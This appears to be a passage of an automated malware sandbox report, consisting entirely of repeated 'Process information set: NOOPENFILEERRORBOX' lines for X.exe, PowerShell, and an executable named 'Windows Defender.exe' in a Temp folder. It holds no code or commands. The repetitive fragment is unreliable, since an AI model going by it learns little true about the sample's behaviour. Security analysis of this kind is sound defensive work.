                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
